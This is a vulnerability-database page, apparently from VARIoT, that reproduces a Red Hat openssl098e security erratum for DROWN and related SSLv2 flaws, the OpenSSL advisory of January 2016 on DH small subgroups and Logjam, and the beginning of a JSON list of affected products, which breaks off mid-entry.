Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.
A padding oracle flaw was found in the Secure Sockets Layer version 2.0 (SSLv2) protocol. An attacker can potentially use this flaw to decrypt RSA-encrypted cipher text from a connection using a newer SSL/TLS protocol version, allowing them to decrypt such connections. This cross-protocol attack is publicly referred to as DROWN. (CVE-2016-0800)
Note: This issue was addressed by disabling the SSLv2 protocol by default when using the 'SSLv23' connection methods, and removing support for weak SSLv2 cipher suites. For more information, refer to the knowledge base article linked to in the References section.
It was discovered that the SSLv2 servers using OpenSSL accepted SSLv2 connection handshakes that indicated non-zero clear key length for non-export cipher suites. An attacker could use this flaw to decrypt recorded SSLv2 sessions with the server by using it as a decryption oracle.(CVE-2016-0703)
It was discovered that the SSLv2 protocol implementation in OpenSSL did not properly implement the Bleichenbacher protection for export cipher suites. An attacker could use a SSLv2 server using OpenSSL as a Bleichenbacher oracle.
A denial of service flaw was found in the way OpenSSL handled SSLv2 handshake messages. This could result in weak SSLv2 ciphers being used for SSLv2 connections, making them vulnerable to man-in-the-middle attacks. (CVE-2015-3197)
Red Hat would like to thank the OpenSSL project for reporting these issues. Upstream acknowledges Nimrod Aviram and Sebastian Schinzel as the original reporters of CVE-2016-0800 and CVE-2015-3197; David Adrian (University of Michigan) and J. Alex Halderman (University of Michigan) as the original reporters of CVE-2016-0703 and CVE-2016-0704; and Sean Burford (Google) and Emilia Käsper (OpenSSL development team) as the original reporters of CVE-2015-0293. For the update to take effect, all services linked to the openssl098e library must be restarted, or the system rebooted.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1202404 - CVE-2015-0293 openssl: assertion failure in SSLv2 servers 1301846 - CVE-2015-3197 OpenSSL: SSLv2 doesn't block disabled ciphers 1310593 - CVE-2016-0800 SSL/TLS: Cross-protocol attack on TLS using SSLv2 (DROWN) 1310811 - CVE-2016-0703 openssl: Divide-and-conquer session key recovery in SSLv2 1310814 - CVE-2016-0704 openssl: SSLv2 Bleichenbacher protection overwrites wrong bytes for export ciphers
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl098e-0.9.8e-20.el6_7.1.src.rpm
i386: openssl098e-0.9.8e-20.el6_7.1.i686.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm
x86_64: openssl098e-0.9.8e-20.el6_7.1.i686.rpm openssl098e-0.9.8e-20.el6_7.1.x86_64.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl098e-0.9.8e-20.el6_7.1.src.rpm
x86_64: openssl098e-0.9.8e-20.el6_7.1.i686.rpm openssl098e-0.9.8e-20.el6_7.1.x86_64.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl098e-0.9.8e-20.el6_7.1.src.rpm
i386: openssl098e-0.9.8e-20.el6_7.1.i686.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm
ppc64: openssl098e-0.9.8e-20.el6_7.1.ppc.rpm openssl098e-0.9.8e-20.el6_7.1.ppc64.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.ppc.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.ppc64.rpm
s390x: openssl098e-0.9.8e-20.el6_7.1.s390.rpm openssl098e-0.9.8e-20.el6_7.1.s390x.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.s390.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.s390x.rpm
x86_64: openssl098e-0.9.8e-20.el6_7.1.i686.rpm openssl098e-0.9.8e-20.el6_7.1.x86_64.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl098e-0.9.8e-20.el6_7.1.src.rpm
i386: openssl098e-0.9.8e-20.el6_7.1.i686.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm
x86_64: openssl098e-0.9.8e-20.el6_7.1.i686.rpm openssl098e-0.9.8e-20.el6_7.1.x86_64.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm openssl098e-debuginfo-0.9.8e-20.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl098e-0.9.8e-29.el7_2.3.src.rpm
x86_64: openssl098e-0.9.8e-29.el7_2.3.i686.rpm openssl098e-0.9.8e-29.el7_2.3.x86_64.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.i686.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl098e-0.9.8e-29.el7_2.3.src.rpm
x86_64: openssl098e-0.9.8e-29.el7_2.3.i686.rpm openssl098e-0.9.8e-29.el7_2.3.x86_64.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.i686.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl098e-0.9.8e-29.el7_2.3.src.rpm
ppc64: openssl098e-0.9.8e-29.el7_2.3.ppc.rpm openssl098e-0.9.8e-29.el7_2.3.ppc64.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.ppc.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.ppc64.rpm
s390x: openssl098e-0.9.8e-29.el7_2.3.s390.rpm openssl098e-0.9.8e-29.el7_2.3.s390x.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.s390.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.s390x.rpm
x86_64: openssl098e-0.9.8e-29.el7_2.3.i686.rpm openssl098e-0.9.8e-29.el7_2.3.x86_64.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.i686.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl098e-0.9.8e-29.el7_2.3.src.rpm
x86_64: openssl098e-0.9.8e-29.el7_2.3.i686.rpm openssl098e-0.9.8e-29.el7_2.3.x86_64.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.i686.rpm openssl098e-debuginfo-0.9.8e-29.el7_2.3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-0293 https://access.redhat.com/security/cve/CVE-2015-3197 https://access.redhat.com/security/cve/CVE-2016-0703 https://access.redhat.com/security/cve/CVE-2016-0704 https://access.redhat.com/security/cve/CVE-2016-0800 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/articles/2176731 https://drownattack.com/ https://openssl.org/news/secadv/20160128.txt https://openssl.org/news/secadv/20160301.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFW36N0XlSAg2UNWIIRAqYBAJ98/98OOTx9c6LlkPHMl7SfneXccQCfX2LY BQ+47lH1uQT1a3RxlYkETOk= =TqD1 -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. OpenSSL Security Advisory [28th Jan 2016] =========================================
NOTE: SUPPORT FOR VERSION 1.0.1 WILL BE ENDING ON 31ST DECEMBER 2016. NO SECURITY FIXES WILL BE PROVIDED AFTER THAT DATE. UNTIL THAT TIME SECURITY FIXES ONLY ARE BEING APPLIED.
DH small subgroups (CVE-2016-0701)
Severity: High
Historically OpenSSL usually only ever generated DH parameters based on "safe" primes. More recently (in version 1.0.2) support was provided for generating X9.42 style parameter files such as those required for RFC 5114 support. The primes used in such files may not be "safe". Where an application is using DH configured with parameters based on primes that are not "safe" then an attacker could use this fact to find a peer's private DH exponent. This attack requires that the attacker complete multiple handshakes in which the peer uses the same private DH exponent. For example this could be used to discover a TLS server's private DH exponent if it's reusing the private DH exponent or it's using a static DH ciphersuite.
OpenSSL provides the option SSL_OP_SINGLE_DH_USE for ephemeral DH (DHE) in TLS. It is not on by default. If the option is not set then the server reuses the same private DH exponent for the life of the server process and would be vulnerable to this attack. It is believed that many popular applications do set this option and would therefore not be at risk.
OpenSSL before 1.0.2f will reuse the key if: - SSL_CTX_set_tmp_dh()/SSL_set_tmp_dh() is used and SSL_OP_SINGLE_DH_USE is not set. - SSL_CTX_set_tmp_dh_callback()/SSL_set_tmp_dh_callback() is used, and both the parameters and the key are set and SSL_OP_SINGLE_DH_USE is not used. This is an undocumted feature and parameter files don't contain the key. - Static DH ciphersuites are used. The key is part of the certificate and so it will always reuse it. This is only supported in 1.0.2.
It will not reuse the key for DHE ciphers suites if: - SSL_OP_SINGLE_DH_USE is set - SSL_CTX_set_tmp_dh_callback()/SSL_set_tmp_dh_callback() is used and the callback does not provide the key, only the parameters. The callback is almost always used like this.
Non-safe primes are generated by OpenSSL when using: - genpkey with the dh_rfc5114 option. This will write an X9.42 style file including the prime-order subgroup size "q". This is supported since the 1.0.2 version. Older versions can't read files generated in this way. - dhparam with the -dsaparam option. This has always been documented as requiring the single use.
The fix for this issue adds an additional check where a "q" parameter is available (as is the case in X9.42 based parameters). This detects the only known attack, and is the only possible defense for static DH ciphersuites. This could have some performance impact.
Additionally the SSL_OP_SINGLE_DH_USE option has been switched on by default and cannot be disabled. This could have some performance impact.
This issue affects OpenSSL version 1.0.2.
OpenSSL 1.0.2 users should upgrade to 1.0.2f
OpenSSL 1.0.1 is not affected by this CVE because it does not support X9.42 based parameters. It is possible to generate parameters using non "safe" primes, but this option has always been documented as requiring single use and is not the default or believed to be common. However, as a precaution, the SSL_OP_SINGLE_DH_USE change has also been backported to 1.0.1r.
This issue was reported to OpenSSL on 12 January 2016 by Antonio Sanso (Adobe). The fix was developed by Matt Caswell of the OpenSSL development team (incorporating some work originally written by Stephen Henson of the OpenSSL core team).
SSLv2 doesn't block disabled ciphers (CVE-2015-3197)
Severity: Low
A malicious client can negotiate SSLv2 ciphers that have been disabled on the server and complete SSLv2 handshakes even if all SSLv2 ciphers have been disabled, provided that the SSLv2 protocol was not also disabled via SSL_OP_NO_SSLv2.
This issue affects OpenSSL versions 1.0.2 and 1.0.1.
OpenSSL 1.0.2 users should upgrade to 1.0.2f OpenSSL 1.0.1 users should upgrade to 1.0.1r
This issue was reported to OpenSSL on 26th December 2015 by Nimrod Aviram and Sebastian Schinzel. The fix was developed by Nimrod Aviram with further development by Viktor Dukhovni of the OpenSSL development team.
An update on DHE man-in-the-middle protection (Logjam)
A previously published vulnerability in the TLS protocol allows a man-in-the-middle attacker to downgrade vulnerable TLS connections using ephemeral Diffie-Hellman key exchange to 512-bit export-grade cryptography. This vulnerability is known as Logjam (CVE-2015-4000). OpenSSL added Logjam mitigation for TLS clients by rejecting handshakes with DH parameters shorter than 768 bits in releases 1.0.2b and 1.0.1n.
This limit has been increased to 1024 bits in this release, to offer stronger cryptographic assurance for all TLS connections using ephemeral Diffie-Hellman key exchange.
OpenSSL 1.0.2 users should upgrade to 1.0.2f OpenSSL 1.0.1 users should upgrade to 1.0.1r
The fix was developed by Kurt Roeckx of the OpenSSL development team.
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/policies/releasestrat.html), support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date. Users of 1.0.1 are advised to upgrade.
Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20160128.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201602-0272", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 2.1, "vendor": "oracle", "version": "8.53" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 2.1, "vendor": "oracle", "version": "2.0" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 2.1, "vendor": "oracle", "version": "8.54" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 2.1, "vendor": "oracle", "version": "1.0" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 2.1, "vendor": "oracle", "version": "8.55" }, { "model": "tuxedo", "scope": "eq", "trust": 2.1, "vendor": "oracle", "version": "12.1.1.0" }, { "model": "oss support tools", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "8.11.16.3.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "5.0.16" }, { "model": "unified computing system central software 1.2", "scope": null, "trust": 1.2, "vendor": "cisco", "version": null }, { "model": "communications network charging and control", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "5.0.0.2.0" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "15.1" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "8.3" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "12.1.4" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "8.4" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "15.2" }, { "model": "communications network charging and control", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "5.0.2.0.0" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "12.2.2" }, { "model": "sun network 10ge switch 72p", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "1.2" }, { "model": "switch es1-24", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "1.3" }, { "model": "communications network charging and control", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "5.0.1.0.0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "5.0.0.1.0" }, { "model": "jd edwards enterpriseone tools", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "9.2.0.5" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "12.3.2" }, { "model": "communications network charging and control", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "4.4.1.5.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "openssl", "version": null }, { "model": "esmpro/serveragentservice", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all versions (linux)" }, { "model": "ucosminexus developer standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series univerge sg3000lg/lj" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v6.2" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.1r" }, { "model": "cosminexus developer version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v7.1" }, { "model": "business intelligence", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "enterprise edition 11.1.1.9.0" }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base version 6" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.2" }, { "model": "cosminexus developer standard version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "capssuite", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0 to v4.0 manager component" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.01" }, { "model": "enterprisedirectoryserver", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all versions" }, { "model": "web server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional for plug-in" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- messaging" }, { "model": "cosminexus application server version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.1" }, { "model": "ucosminexus developer light", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series sg3600lm/lg/lj v6.1" }, { "model": "cosminexus developer light version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "st ard-r" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "business intelligence", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "enterprise edition 12.1.1.0.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v4.0" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.0" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.02" }, { "model": "communications applications", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "of oracle enterprise session border controller ecz7.3m1p4 and earlier" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series intersecvm/sg v1.2" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v7.0" }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "ucosminexus service architect", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "40g 10g 72/64 ethernet switch", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "2.0.0" }, { "model": "ucosminexus application server enterprise", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.6.29 and earlier" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "business intelligence", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "enterprise edition 11.1.1.7.0" }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.7.11 and earlier" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "express" }, { "model": "sun blade 6000 ethernet switched nem 24p 10ge", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "1.2" }, { "model": "oss support tools", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "oracle explorer 8.11.16.3.8" }, { "model": "web server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- security enhancement" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "application navigator agent ver3.3 to ver4.1" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.2f" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "01" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.0" }, { "model": "websam mcoperations", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.6.2 to ver4.2" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "application navigator manager ver3.2.2 to ver4.1" }, { "model": "websam systemmanager", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver5.5.2 to ver6.2.1" }, { "model": "ucosminexus application server standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "business intelligence", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "enterprise edition 12.2.1.1.0" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.1" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2" }, { "model": "ucosminexus application server smart edition", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "wireless ap", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "396510.11.1" }, { "model": "wireless ap", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "382510.1.1" }, { "model": "wireless ap", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "386510.1.4" }, { "model": "wireless ap", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "380110.1.4" }, { "model": "wireless ap", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "396510.1.1" }, { "model": "wireless ap", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "380510.1.1" }, { "model": "wireless ap", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "382510.11.1" }, { "model": "wireless ap", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "386510.1.1" }, { "model": "wireless ap", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "371510.1.1" }, { "model": "wireless ap", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "380110.1.1" }, { "model": "wireless ap", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "371510.1.4" }, { "model": "wireless ap", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "380110.11.1" }, { "model": "wireless ap", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "393510.11.1" }, { "model": "wireless ap", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "382510.1.4" }, { "model": "wireless ap", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "393510.1.1" }, { "model": "wireless ap", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "380510.1.4" }, { "model": "wireless ap", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "396510.1.4" }, { "model": "wireless ap", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "380510.11.1" }, { "model": "wireless ap", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "371510.11.1" }, { "model": "extremexos", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "0" }, { "model": "wireless ap", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "386510.11.1" }, { "model": "wireless ap", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "393510.1.4" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.3" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.2" }, { "model": "registered envelope service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.2-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.3" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.9" }, { "model": "enterprise virtualization", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "3" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.10" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "cognos insight fp if", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.216" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "webex 